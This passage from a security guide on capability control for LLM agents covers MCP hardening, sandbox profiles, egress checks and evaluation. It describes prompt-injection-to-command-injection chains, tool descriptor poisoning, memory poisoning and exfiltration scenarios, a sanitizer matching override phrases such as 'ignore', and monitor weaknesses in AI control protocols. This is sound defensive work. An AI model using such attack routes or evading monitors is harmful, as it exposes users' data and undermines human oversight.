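A last-line egress check before any external write might combine a destination allowlist with secret-shape scanning. The patterns below match common token shapes and the allowlist is illustrative; scanning is best-effort telemetry layered on top of IFC, not a substitute for it.

```python
import re

# Best-effort secret-shape patterns (illustrative, not exhaustive).
SECRET_PATTERNS = [
    re.compile(r"ghp_[A-Za-z0-9]{36}"),   # GitHub classic PAT shape
    re.compile(r"AKIA[0-9A-Z]{16}"),      # AWS access key ID shape
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
]
ALLOWED_DOMAINS = {"example.com"}          # per-task destination allowlist

def check_egress(destination_domain: str, body: str) -> None:
    """Raise before the write; callers record the decision as an audit event."""
    if destination_domain not in ALLOWED_DOMAINS:
        raise PermissionError(f"destination {destination_domain} not allowlisted")
    for pattern in SECRET_PATTERNS:
        if pattern.search(body):
            raise PermissionError("secret-shaped string in outbound body")
```

The same check applies to every sink in the list above, not just HTTP: a commit message, a file name, and an image URL are all "body" from the egress controller's point of view.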
8. Practical Deployment Patterns
8.1 Pattern A: Read-Only Research Agent
A research agent that reads public web pages and produces summaries should receive:
- No private data.
- No authenticated browser session.
- No filesystem except scratch.
- No email or messaging tools.
- Network egress only through a fetch proxy.
- Retrieval cache labeled public/untrusted.
- Output citation validation.
This agent can be useful with low risk because the lethal trifecta is incomplete: it has untrusted input and egress, but no sensitive data.
8.2 Pattern B: Enterprise Knowledge Assistant
An enterprise assistant over internal documents has sensitive data and untrusted-ish user prompts. It should avoid side effects entirely unless separately authorized.
Controls:
- Per-user retrieval ACLs.
- Tenant and group isolation.
- Document labels propagated into context.
- No external URLs in generated responses unless allowed.
- No email/send tools by default.
- Secret and PII output scanning.
- Query logging with privacy controls.
- Memory disabled or scoped to the user.
- No arbitrary connector chaining.
The highest-risk feature is “send this answer to X.” That is a data sink and must be separately policy-checked.
8.3 Pattern C: Coding Agent
A coding agent needs filesystem and command execution, so it needs strong sandboxing.
Controls:
- Per-repository workspace.
- No access to unrelated repositories.
- No host SSH agent or cloud credentials.
- Package install through a proxy with allowlists.
- Network disabled unless task requires it.
- Tests run in sandbox.
- Git commits generated but not pushed without review.
- PR descriptions scanned for secrets and provenance.
- Tool output from issue comments and code comments labeled untrusted.
- Repository tokens scoped to one repo and minimal permissions.
The Amazon Q Developer extension incident in July 2025 illustrates the supply-chain dimension: a malicious pull request introduced a destructive prompt into an extension release, reportedly affecting version 1.84.0 before replacement. The important architectural lesson is that coding agents must treat prompts, extensions, skills, MCP servers, and repository content as supply-chain inputs, not trusted configuration (Amazon Q Developer Extension Incident, 2025). (techradar.com)
8.4 Pattern D: Operations Agent
An operations agent that can inspect Kubernetes, cloud resources, or incidents needs strict separation between observe and act.
Controls:
- Read-only by default.
- Break-glass workflows for mutation.
- Dry-run first.
- Change plans signed by human approvers.
- No shell-backed tools exposed directly to the model.
- Parameterized APIs instead of CLI string construction.
- Environment without broad kubeconfig or cloud admin tokens.
- Per-cluster and per-namespace scoping.
- Rollback plans.
- Post-action verification.
- Immutable audit logs.
The mcp-server-kubernetes advisory shows why shell-backed wrappers are dangerous. If a tool builds kubectl strings with unsanitized model-influenced arguments, prompt injection can become command injection (CVE-2025-53355). (github.com)
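The difference can be made concrete. In the sketch below, the validators and the replica bound are illustrative assumptions (not taken from any real wrapper); the point is that an injection-bearing name survives string splicing but fails strict parameter validation:

```javascript
// Why string-built kubectl wrappers are dangerous: a model-influenced
// name like "web; curl evil.example | sh" passes straight through string
// concatenation, but a strict validator on parameterized arguments rejects it.
const K8S_NAME = /^[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])?$/; // RFC 1123 label shape

function buildShellCommand(name, replicas) {
  // Anti-pattern: untrusted value flows into a shell string.
  return `kubectl scale deployment ${name} --replicas=${replicas}`;
}

function validateScaleArgs(name, replicas) {
  if (!K8S_NAME.test(name)) throw new Error(`invalid resource name: ${name}`);
  if (!Number.isInteger(replicas) || replicas < 0 || replicas > 50) {
    throw new Error(`invalid replica count: ${replicas}`);
  }
  return { name, replicas }; // safe to hand to a parameterized API client
}
```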
8.5 Pattern E: Browser Agent
A browser agent should operate like a remote untrusted user session:
- Fresh browser profile.
- No default cookies.
- Explicit credential injection per origin.
- DOM and screenshot provenance.
- Form-submit approval for sensitive domains.
- Payment and purchase disabled unless explicitly granted.
- Download sandbox.
- File upload allowlists.
- Visual prompt-injection warnings where content is untrusted.
- Step-level recording.
Browser agents are uniquely exposed because every page is both task content and adversarial instruction surface.
9. MCP-Specific Capability Control
MCP has become the standard interface layer for tool discovery and invocation, which makes it a natural enforcement point and a natural attack surface.
9.1 What MCP Gives You
MCP standardizes how clients discover tools, resources, prompts, and server capabilities. Its authorization specification provides transport-level OAuth-oriented mechanisms for restricted MCP servers, including PKCE, HTTPS requirements, secure token storage, token expiration, and invalid-scope semantics (MCP Authorization Specification, 2025). (modelcontextprotocol.io)
This is useful plumbing. It does not solve agent authorization by itself.
9.2 What MCP Does Not Prove
MCP does not inherently prove:
- The server’s tool description is honest.
- The server’s implementation matches its description.
- Tool semantics are unchanged since approval.
- A tool is safe to compose with another tool.
- A model-selected call is authorized for the current task.
- Data from one server may flow to another server.
- A local stdio server is safe to execute.
- A tool result is free of prompt injection.
MCP is an interface, not a sandbox.
9.3 Secure MCP Gateway Requirements
A production MCP gateway should implement:
- Tool inventory: all servers, versions, hashes, owners, scopes.
- Descriptor pinning: alert and approval on tool-description changes.
- Semantic diffing: flag added verbs such as send, delete, execute, publish.
- Capability mapping: each tool operation maps to a policy action.
- Per-tool credentials: no server receives broad ambient tokens.
- Session labels: data returned by tools carries confidentiality/integrity labels.
- Flow rules: cross-server data movement is policy-checked.
- Sandboxed stdio servers: local servers run in containers, gVisor, WASM, or microVMs.
- Egress control: servers cannot call arbitrary network destinations unless granted.
- Audit: full request/response metadata, redacted content, policy decisions.
9.4 Handling MCP Tool Poisoning
Tool descriptors should be treated as untrusted content with privileged consequences. The gateway should:
- Hide raw descriptors from the planner when possible.
- Provide normalized, administrator-reviewed tool summaries.
- Strip invisible Unicode, markdown links, and instruction-like text from descriptors.
- Require signed descriptor manifests.
- Pin server package versions and hashes.
- Reject descriptor drift at runtime.
- Run canary prompts against new tools before enabling them.
- Separate “tool documentation for humans” from “tool affordance schema for models.”
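The stripping step can be sketched as a small sanitizer. The character ranges and the instruction-line pattern set are illustrative and deliberately incomplete; they show the shape of the defense, not an exhaustive filter:

```javascript
// Descriptor sanitization before anything reaches the planner: strip
// invisible Unicode, flatten markdown links, and remove instruction-like lines.
const INVISIBLE = /[\u200b-\u200f\u202a-\u202e\u2060-\u206f\ufeff]/g; // zero-width, bidi controls
const MD_LINK = /\[([^\]]*)\]\([^)]*\)/g;                             // [text](url) -> text
const INSTRUCTION_LINE = /^\s*(ignore|disregard|you must|always|before using)\b.*$/gim;

function sanitizeDescriptor(text) {
  return text
    .replace(INVISIBLE, '')
    .replace(MD_LINK, '$1')
    .replace(INSTRUCTION_LINE, '[removed instruction-like line]')
    .trim();
}
```

Sanitization is a hardening layer, not a boundary: a determined attacker can phrase instructions the patterns miss, which is why descriptor pinning, signing, and canary prompts sit alongside it.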
9.5 Handling Local MCP Servers
Local stdio MCP servers are especially risky because they often run with the developer’s filesystem, environment variables, and shell. A safe local MCP execution profile should include:
- No inherited environment except explicit allowlist.
- Read-only project mount.
- Separate scratch mount.
- No home directory mount.
- No SSH agent socket.
- No Docker socket.
- No cloud credential files.
- Network disabled unless needed.
- Process timeout and memory limit.
- Tool-level seccomp/AppArmor profile.
- Hash-pinned package.
The NVD entry for CVE-2025-68143 shows the class of filesystem-boundary problem: prior to version 2025.9.25, mcp-server-git’s git_init accepted arbitrary filesystem paths, making accessible directories eligible for subsequent Git operations; the tool was removed and users were advised to upgrade (CVE-2025-68143). (nvd.nist.gov)
10. Evaluating Agent Sandboxes and Capability Controls
Security teams should not evaluate agents only by task success. They need adversarial, flow-aware, and system-level metrics.
10.1 Core Metrics
A useful evaluation suite reports:
- Task success rate: benign tasks completed correctly.
- Attack success rate: attacker objective achieved.
- Secure task completion: task completed without policy violation.
- Over-refusal rate: benign task blocked unnecessarily.
- Sensitive-flow violations: confidential data reached unauthorized sink.
- Integrity violations: untrusted content controlled privileged action.
- Approval burden: number and quality of human prompts.
- Time/cost overhead: latency and execution cost.
- Sandbox escape attempts blocked: filesystem, network, process, syscall.
- Credential exposure: secrets visible to model, tools, sandbox, logs.
- Policy coverage: percentage of tools/resources/actions mapped to policy.
- Audit completeness: ability to reconstruct source-to-sink path.
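Several of these metrics fall directly out of per-episode records. The record shape below is an assumption for illustration; the key point is that attack success is computed over attacked episodes and over-refusal over benign ones:

```javascript
// Computing core metrics from evaluation episodes.
function summarize(episodes) {
  const frac = (xs, pred) => (xs.length ? xs.filter(pred).length / xs.length : 0);
  const attacked = episodes.filter((e) => e.attacked);
  const benign = episodes.filter((e) => !e.attacked);
  return {
    taskSuccessRate: frac(benign, (e) => e.taskCompleted),
    attackSuccessRate: frac(attacked, (e) => e.attackerGoalReached),
    secureTaskCompletion: frac(episodes, (e) => e.taskCompleted && !e.policyViolation),
    overRefusalRate: frac(benign, (e) => !e.taskCompleted && e.blockedByPolicy),
  };
}
```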
10.2 Benchmarks to Use
No single benchmark is sufficient.
- AgentDojo is the baseline for tool-using agents under indirect prompt injection, with 97 tasks and 629 security test cases (AgentDojo, NeurIPS 2024).
- InjecAgent is useful for broad tool-integrated indirect prompt injection, with 1,054 test cases across 17 user tools and 62 attacker tools (InjecAgent, Findings of ACL 2024).
- AgentVigil represents adaptive black-box fuzzing and should be used to test whether defenses survive automated attacker search (AgentVigil, arXiv 2025).
- AgentPoison and PoisonedRAG evaluate persistence through memory and knowledge-base poisoning (AgentPoison, NeurIPS 2024; PoisonedRAG, USENIX Security 2025).
- Production CVE regression tests should replay known MCP exploit patterns such as prompt-injection-to-command-injection chains in Kubernetes and package-doc servers (CVE-2025-53355; CVE-2025-54073).
10.3 Red-Team Scenarios
Every production deployment should include scenarios for:
- Public issue injects private repository exfiltration.
- Email injects CRM export.
- Package docs inject shell command.
- Log line injects Kubernetes mutation.
- RAG document injects external URL beacon.
- Memory entry persists malicious preference.
- Tool descriptor changes after approval.
- Browser page tricks agent into OAuth consent.
- Generated code tries network exfiltration.
- Agent-to-agent message launders untrusted instruction.
A defense that has not been tested against adaptive and multi-step attacks should be considered unproven.
11. Implementation Checklist
11.1 Inventory
Start by inventorying:
- Agents.
- Tools.
- MCP servers.
- Credentials.
- Data sources.
- Memory stores.
- Retrieval indexes.
- External sinks.
- Browser profiles.
- Code-execution environments.
- Human approval paths.
- Logs.
Most organizations discover that agents have broader access than the tasks require.
11.2 Classify Tools by Risk
A practical risk hierarchy:
| Class | Examples | Default control |
|---|---|---|
| Pure transform | summarize local text, parse CSV | allow in-process if no secrets |
| Read public | fetch public URL, read public issue | allow with labels |
| Read private | read email, repo, CRM, docs | scoped capability |
| Write private | update ticket, draft doc | approval or workflow policy |
| External send | email, public comment, webhook | IFC + destination allowlist |
| Execute code | shell, notebook, package install | sandbox + no ambient secrets |
| Admin mutate | cloud IAM, Kubernetes patch, delete DB | human approval + break-glass |
| Financial/legal | payments, contracts, filings | deterministic workflow, not autonomous |
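The table's defaults can be encoded so every tool gets a baseline decision before task-specific policy exists, and unclassified tools fail closed. The control flags are illustrative:

```javascript
// Default controls per risk class, mirroring the table above.
const DEFAULT_CONTROLS = {
  pure_transform:  { sandbox: false, approval: false },
  read_public:     { sandbox: false, approval: false, label: 'untrusted' },
  read_private:    { scopedCapability: true },
  write_private:   { approval: true },
  external_send:   { approval: true, egressCheck: true, destinationAllowlist: true },
  execute_code:    { sandbox: true, ambientSecrets: false },
  admin_mutate:    { sandbox: true, approval: true, breakGlass: true },
  financial_legal: { autonomous: false, deterministicWorkflow: true },
};

function defaultControl(toolClass) {
  const control = DEFAULT_CONTROLS[toolClass];
  // Fail closed: a tool nobody classified gets no access at all.
  if (!control) throw new Error(`unclassified tool class: ${toolClass}`);
  return control;
}
```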
11.3 Remove Ambient Authority
Immediate hardening steps:
- Do not pass host environment variables to tools.
- Do not mount home directories.
- Do not expose Docker socket.
- Do not reuse developer cloud credentials.
- Do not share browser cookies across tasks.
- Do not grant all MCP tools to all sessions.
- Do not allow network egress by default from code sandboxes.
- Do not let the model choose arbitrary command strings.
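The first item is the easiest to get wrong, because `child_process` inherits the parent environment by default. A minimal sketch, with an illustrative allowlist:

```javascript
// Removing ambient authority from spawned tool processes: never pass the
// parent environment through; build a minimal one from an explicit allowlist.
const ENV_ALLOWLIST = ['PATH', 'LANG', 'TZ'];

function scopedEnv(parentEnv, taskVars = {}) {
  const env = {};
  for (const key of ENV_ALLOWLIST) {
    if (parentEnv[key] !== undefined) env[key] = parentEnv[key];
  }
  // Task-specific variables are added explicitly, never inherited.
  return { ...env, ...taskVars };
}

// Usage with child_process (the child sees none of the parent's secrets):
//   execFileSync('node', ['tool.js'], { env: scopedEnv(process.env, { TASK_ID: 't1' }) });
```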
11.4 Use Parameterized Tools
Replace shell strings with parameterized APIs. Bad:

```javascript
exec(`kubectl scale ${resourceType} ${name} --replicas=${replicas}`)
```

Better:

```javascript
kubernetes.apps.v1.patchNamespacedDeploymentScale({
  name: validateName(name),
  namespace: validateNamespace(namespace),
  body: validateScale(replicas)
})
```
Better still: put the mutation behind a policy-checked operations workflow that requires a dry run and approval.
11.5 Separate Observe, Plan, and Act
The planner should not freely interleave reads and writes. A safer loop:
- Observe within scoped read capabilities.
- Produce a structured plan.
- Policy-check the plan.
- Ask for approval if needed.
- Execute with narrowly minted write capabilities.
- Verify.
- Revoke capabilities.
This makes risk transitions visible.
11.6 Log Provenance, Not Just Calls
Audit records should include:
- User request.
- Task policy.
- Capability grants.
- Tool calls.
- Tool arguments.
- Tool result labels.
- Data origins that influenced each call.
- Policy decision.
- Human approval record.
- Sandbox ID.
- External sink destination.
- Redacted content hash.
Without provenance, incident response cannot distinguish a model mistake from an injection-driven flow.
12. Open Problems
12.1 Automatic Least-Privilege Inference
Developers do not want to hand-author policies for every task. The field needs systems that infer minimum viable capabilities from task descriptions, historical traces, and workflow definitions, then produce reviewable policy. The hard part is avoiding under-scoped policies that break utility and over-scoped policies that recreate ambient authority.
12.2 Robust Declassification
Many useful tasks require moving confidential data to authorized sinks. IFC systems need principled declassification: who approved it, for what purpose, at what granularity, to which recipient, with what transformations, and for how long.
12.3 Semantic Data Laundering
A model can leak without copying. “The password is the name of the founder’s dog plus 2024” may evade literal secret scanners. Summaries, classifications, embeddings, and choices among allowed actions can all encode sensitive facts. Detecting semantic leakage remains unsolved.
12.4 Multi-Agent Capability Propagation
Agent-to-agent systems create delegation problems. If Agent A has private data and Agent B has external-send authority, their composition may recreate the lethal trifecta. Capability delegation needs attenuation, non-transferability, and provenance across agent boundaries.
12.5 Usable Human Approval
Approval fatigue is a security vulnerability. Research is needed on approval interfaces that show provenance, risk, and diffed effects in a form humans can evaluate quickly.
12.6 Standardized Tool Attestation
MCP-like ecosystems need signed tool descriptors, reproducible builds, semantic versioning of capabilities, vulnerability feeds, registry trust, and runtime attestation. Without this, tool poisoning and rug pulls remain structurally easy.
12.7 AI Control and Monitor Robustness
AI-control protocols use trusted models, monitors, resampling, deferral, and editing to supervise more capable untrusted models. The approach is promising, but monitor-based protocols are vulnerable to adaptive attacks when the attacker can infer or simulate the monitor. Recent work on untrusted-agent control found that red-team affordances such as knowledge of resampling can substantially reduce safety for some protocols, while deferring critical actions to trusted policies is more robust (AI Control, ICML 2024; Evaluating Control Protocols for Untrusted AI Agents, 2025). Capability control should therefore treat monitors as advisory risk signals, not as sole authorization mechanisms. (proceedings.mlr.press)
13. The Defensible Position
The defensible position for 2026 is simple:
- Treat the LLM planner as untrusted.
- Treat all external content as instructions-capable data.
- Treat tool calls as untrusted outputs requiring authorization.
- Remove ambient authority.
- Mint narrow, expiring capabilities per task.
- Enforce policy outside the model.
- Track information flows from sources to sinks.
- Sandbox untrusted computation and tool servers.
- Require explicit declassification for confidential data.
- Evaluate with adaptive, multi-step, production-like attacks.
This does not make agents perfectly safe. It changes the failure mode. Without capability control, a prompt injection can become an authorized action. With capability control, the same injection becomes a denied tool call, a quarantined memory, a blocked egress attempt, or an approval request with provenance. That is the difference between hoping the model behaves and engineering a security boundary.
References
- Alizadeh, Meysam; Samei, Zeynab; Stetsenko, Daria; Gilardi, Fabrizio. “Simple Prompt Injection Attacks Can Leak Personal Data Observed by LLM Agents During Task Execution.” arXiv, 2025. https://arxiv.org/abs/2506.01055
- Amazon Q Developer Extension incident coverage. “Amazon's AI coding agent was hacked.” TechRadar, 2025. https://www.techradar.com/pro/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands
- Chen, Zhaorun; Xiang, Zhen; Xiao, Chaowei; Song, Dawn; Li, Bo. “AgentPoison: Red-teaming LLM Agents via Poisoning Memory or Knowledge Bases.” NeurIPS, 2024. https://arxiv.org/abs/2407.12784
- Costa, Manuel; Köpf, Boris; Kolluri, Aashish; Paverd, Andrew; Russinovich, Mark; Salem, Ahmed; Tople, Shruti; Wutschitz, Lukas; Zanella-Béguelin, Santiago. “Securing AI Agents with Information-Flow Control.” arXiv, 2025. https://arxiv.org/abs/2505.23643
- Debenedetti, Edoardo; Shumailov, Ilia; Fan, Tianqi; Hayes, Jamie; Carlini, Nicholas; Fabian, Daniel; Kern, Christoph; Shi, Chongyang; Terzis, Andreas; Tramèr, Florian. “Defeating Prompt Injections by Design.” arXiv, 2025. https://arxiv.org/abs/2503.18813
- Debenedetti, Edoardo; Zhang, Jie; Balunović, Mislav; Beurer-Kellner, Luca; Fischer, Marc; Tramèr, Florian. “AgentDojo: A Dynamic Environment to Evaluate Prompt Injection Attacks and Defenses for LLM Agents.” NeurIPS Datasets and Benchmarks, 2024. https://arxiv.org/abs/2406.13352
- Docker. “Seccomp security profiles for Docker.” Docker Docs, accessed 2026. https://docs.docker.com/engine/security/seccomp/
- Firecracker maintainers. “Firecracker: Secure and fast microVMs for serverless computing.” GitHub, accessed 2026. https://github.com/firecracker-microvm/firecracker
- GitHub Advisory Database. “MCP Server Kubernetes vulnerable to command injection in several tools.” CVE-2025-53355 / GHSA-gjv4-ghm7-q58q, 2025. https://github.com/advisories/GHSA-gjv4-ghm7-q58q
- GitHub Advisory Database. “mcp-package-docs vulnerable to command injection in several tools.” CVE-2025-54073 / GHSA-vf9j-h32g-2764, 2025. https://github.com/advisories/GHSA-vf9j-h32g-2764
- Google gVisor project. “What is gVisor?” gVisor Docs, accessed 2026. https://gvisor.dev/docs/
- Greenblatt, Ryan; Shlegeris, Buck; Sachan, Kshitij; Roger, Fabien. “AI Control: Improving Safety Despite Intentional Subversion.” ICML, 2024. https://proceedings.mlr.press/v235/greenblatt24a.html
- Invariant Labs. “GitHub MCP Exploited: Accessing private repositories via MCP.” 2025. https://invariantlabs.ai/blog/mcp-github-vulnerability
- Microsoft Security Response Center / Aim Security coverage. “Microsoft 365 Copilot zero-click vulnerability enabled data exfiltration.” CVE-2025-32711 / EchoLeak, 2025. https://www.scworld.com/news/microsoft-365-copilot-zero-click-vulnerability-enabled-data-exfiltration
- Model Context Protocol. “Authorization.” MCP Specification, 2025-06-18. https://modelcontextprotocol.io/specification/2025-06-18/basic/authorization
- Model Context Protocol. “Understanding Authorization in MCP.” MCP Docs, accessed 2026. https://modelcontextprotocol.io/docs/tutorials/security/authorization
- National Vulnerability Database. “CVE-2025-68143.” NIST NVD, 2025/2026. https://nvd.nist.gov/vuln/detail/CVE-2025-68143
- Ntousakis, Grigoris; Stephen, Julian James; Le, Michael; Chukkapalli, Sai Sree Laya; Taylor, Teryl; Molloy, Ian; Araujo, Fred. “Securing MCP-based Agent Workflows.” SOSP Workshop, 2025. https://research.ibm.com/publications/securing-mcp-based-agent-workflows
- Wang, Zhun; Siu, Vincent; Ye, Zhe; Shi, Tianneng; Nie, Yuzhou; Zhao, Xuandong; Wang, Chenguang; Guo, Wenbo; Song, Dawn. “AgentVigil: Generic Black-Box Red-teaming for Indirect Prompt Injection against LLM Agents.” arXiv, 2025. https://arxiv.org/abs/2505.05849
- WebAssembly Community Group. “Security.” WebAssembly Docs, accessed 2026. https://webassembly.org/docs/security/
- Zhan, Qiusi; Liang, Zhixiang; Ying, Zifan; Kang, Daniel. “InjecAgent: Benchmarking Indirect Prompt Injections in Tool-Integrated Large Language Model Agents.” Findings of ACL, 2024. https://arxiv.org/abs/2403.02691
- Richards, Jer. “secure-agent-ref: Reference implementation of agent capability control.” GitHub, 2026. https://github.com/binaryninja/secure-agent-ref
- Zou, Wei; Geng, Runpeng; Wang, Binghui; Jia, Jinyuan. “PoisonedRAG: Knowledge Corruption Attacks to Retrieval-Augmented Generation of Large Language Models.” USENIX Security, 2025. https://www.usenix.org/conference/usenixsecurity25/presentation/zou